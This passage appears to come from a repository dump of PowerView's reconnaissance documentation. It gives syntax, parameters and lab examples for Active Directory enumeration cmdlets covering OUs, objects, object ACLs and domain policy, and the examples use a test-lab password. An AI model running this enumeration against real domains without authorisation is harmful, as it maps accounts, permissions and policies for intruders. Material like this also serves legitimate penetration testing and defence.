--------------------------\r\n```\r\nGet-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv\r\n```\r\n\r\nStore a list of all security groups with managers in group-managers.csv\r\n\r\n## PARAMETERS\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.ManagedSecurityGroup\r\n\r\nA custom PSObject describing the managed security group.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainOU.md",
    "content": "# Get-DomainOU\r\n\r\n## SYNOPSIS\r\nSearch for all organization units (OUs) or specific OU objects in AD.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainOU [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]\r\n [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]\r\n [-Credential <PSCredential>] [-Raw]\r\n```\r\n\r\n## DESCRIPTION\r\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\r\nLDAP filter based on targeting/filter parameters, and searches for all objects\r\nmatching the criteria.\r\nTo only return specific properies, use\r\n\"-Properties whencreated,usnchanged,...\".\r\nBy default, all OU objects for\r\nthe current domain are returned.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainOU\r\n```\r\n\r\nReturns the current OUs in the domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainOU *admin* -Domain testlab.local\r\n```\r\n\r\nReturns all OUs with \"admin\" in their name in the testlab.local domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainOU -GPLink \"F260B76D-55C8-46C5-BEF1-9016DD98E272\"\r\n```\r\n\r\nReturns all OUs with linked to the specified group policy object.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n\"*admin*\",\"*server*\" | Get-DomainOU\r\n```\r\n\r\nSearch for OUs with the specific names.\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainOU -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nAn OU name (e.g.\r\nTestOU), DistinguishedName (e.g.\r\nOU=TestOU,DC=testlab,DC=local), or\r\nGUID (e.g.\r\n8a9ba22a-8977-47e6-84ce-8c26af4e1e6a).\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -GPLink\r\nOnly return OUs with the specified GUID in their gplink property.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: GUID\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SecurityMasks\r\nSpecifies an option for examining security information of a directory object.\r\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FindOne\r\nOnly return one result object.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: ReturnOne\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Raw\r\nSwitch.\r\nReturn raw results instead of translating the fields into a custom PSObject.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.OU\r\n\r\nCustom PSObject with translated OU property fields.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainObject.md",
    "content": "# Get-DomainObject\r\n\r\n## SYNOPSIS\r\nReturn all (or specified) domain objects in AD.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainObject [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]\r\n [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]\r\n [-Raw]\r\n```\r\n\r\n## DESCRIPTION\r\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\r\nLDAP filter based on targeting/filter parameters, and searches for all objects\r\nmatching the criteria.\r\nTo only return specific properies, use\r\n\"-Properties samaccountname,usnchanged,...\".\r\nBy default, all objects for\r\nthe current domain are returned.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainObject -Domain testlab.local\r\n```\r\n\r\nReturn all objects for the testlab.local domain\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname\r\n```\r\n\r\ndistinguishedname\r\n-----------------\r\nCN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local\r\nCN=dfm,CN=Users,DC=testlab,DC=local\r\nOU=OU3,DC=testlab,DC=local\r\nCN=dfm (admin),CN=Users,DC=testlab,DC=local\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainObject -Credential $Cred -Identity 'windows1'\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nGet-Domain | Select-Object -Expand name\r\n```\r\n\r\ntestlab.local\r\n\r\n'testlab\\harmj0y','DEV\\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainUser\\] Extracted domain 'testlab.local' from 'testlab\\harmj0y'\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainObject\\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))\r\n\r\ndistinguishedname\r\n-----------------\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainUser\\] Extracted domain 'dev.testlab.local' from 'DEV\\Domain Admins'\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainObject\\] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins)))\r\nCN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA SamAccountName (e.g.\r\nharmj0y), DistinguishedName (e.g.\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SecurityMasks\r\nSpecifies an option for examining security information of a directory object.\r\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FindOne\r\nOnly return one result object.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: ReturnOne\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Raw\r\nSwitch.\r\nReturn raw results instead of translating the fields into a custom PSObject.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.ADObject\r\n\r\nCustom PSObject with translated AD object property fields.\r\n\r\nPowerView.ADObject.Raw\r\n\r\nThe raw DirectoryServices.SearchResult object, if -Raw is enabled.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainObjectAcl.md",
    "content": "# Get-DomainObjectAcl\r\n\r\n## SYNOPSIS\r\nReturns the ACLs associated with a specific active directory object.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Get-DomainGUIDMap\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainObjectAcl [[-Identity] <String[]>] [-ResolveGUIDs] [-RightsFilter <String>] [-Domain <String>]\r\n [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\n{{Fill in the Description}}\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs\r\n```\r\n\r\nGet the ACLs for the matt.admin user in the testlab.local domain and\r\nresolve relevant GUIDs to their display names.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainOU | Get-DomainObjectAcl -ResolveGUIDs\r\n```\r\n\r\nEnumerate the ACL permissions for all OUs in the domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainObjectAcl -Credential $Cred -ResolveGUIDs\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA SamAccountName (e.g.\r\nharmj0y), DistinguishedName (e.g.\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResolveGUIDs\r\nSwitch.\r\nResolve GUIDs to their display names.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -RightsFilter\r\nA specific set of rights to return ('All', 'ResetPassword', 'WriteMembers').\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Rights\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.ACL\r\n\r\nCustom PSObject with ACL entries.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainPolicy.md",
    "content": "# Get-DomainPolicy\r\n\r\n## SYNOPSIS\r\nReturns the default domain policy or the domain controller policy for the current\r\ndomain or a specified domain/domain controller.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainPolicy [[-Domain] <String>] [-Source <String>] [-Server <String>] [-ServerTimeLimit <Int32>]\r\n [-ResolveSids] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nReturns the default domain policy or the domain controller policy for the current\r\ndomain or a specified domain/domain controller using Get-DomainGPO.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainPolicy\r\n```\r\n\r\nReturns the domain policy for the current domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainPolicy -Domain dev.testlab.local\r\n```\r\n\r\nReturns the domain policy for the dev.testlab.local domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainPolicy -Source DC -Domain dev.testlab.local\r\n```\r\n\r\nReturns the policy for the dev.testlab.local domain controller.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainPolicy -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Domain\r\nThe domain to query for default policies, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Source\r\nExtract 'Domain' or 'DC' (domain controller) policies.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Domain\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResolveSids\r\nSwitch.\r\nResolve Sids from a DC policy to object names.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### Hashtable\r\n\r\nOuputs a hashtable representing the parsed GptTmpl.inf file.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainSID.md",
